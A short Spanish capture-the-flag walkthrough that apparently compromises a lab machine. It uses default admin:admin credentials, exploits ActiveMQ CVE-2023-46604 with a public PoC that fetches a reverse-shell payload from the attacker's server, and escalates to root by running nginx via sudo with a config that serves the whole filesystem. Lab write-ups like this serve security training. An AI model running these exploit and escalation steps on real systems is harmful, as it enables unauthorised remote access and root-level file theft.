Hacemos el reconocimiento de nmap:

Accedemos al puerto 80 y nos encontramos con esto:

Pero si ponemos admin:admin accedemos:

Pero si hacemos clic en este enlace, nos redirige a un panel de admin:

Donde vemos información sensible, como la versión 5.15 de este servicio:

Y si buscamos por internet, encontramos el CVE-2023-46604:

Buscamos una PoC en github y nos encontramos la siguiente: https://github.com/evkl1d/CVE-2023-46604

Donde nos indican que vamos a necesitar subir con este exploit el fichero poc.xml:

Vemos las instrucciones de uso:

Editamos el contenido del fichero poc.xml añadiendo la reverse shell:

Nos ponemos a la escucha con netcat:

Levantamos un servidor HTTP con Python con el archivo PoC.xml:

Ejecutamos el exploit:

python3 exploit.py -i 10.10.11.243 -u http://10.10.16.7/poc.xml

Y habremos recibido la reverse shell:

Vemos que podemos ejecutar con root nginx:

Para ello, nos copiamos el fichero de configuración de nginx y lo modificamos:

cp /etc/nginx/nginx.conf /tmp  
mv nginx.conf pwned.conf

Y lo editamos añadiendo el siguiente contenido:

user root;
events {
    worker_connections 1024;
}
http {
    server {
        listen 1337;
        root /;
        autoindex on;
    }
}

Ahora levantamos el servidor nginx cargando el nuevo fichero de configuración malicioso:

sudo /usr/sbin/nginx -c /tmp/hack.conf

Y ahora desde curl y especificando el puerto 1337, que fue el que indicamos antes, ya podremos acceder a cualquier directorio o archivo del sistema ya que estaríamos moviéndonos como root:

curl localhost:1337/root/root.txt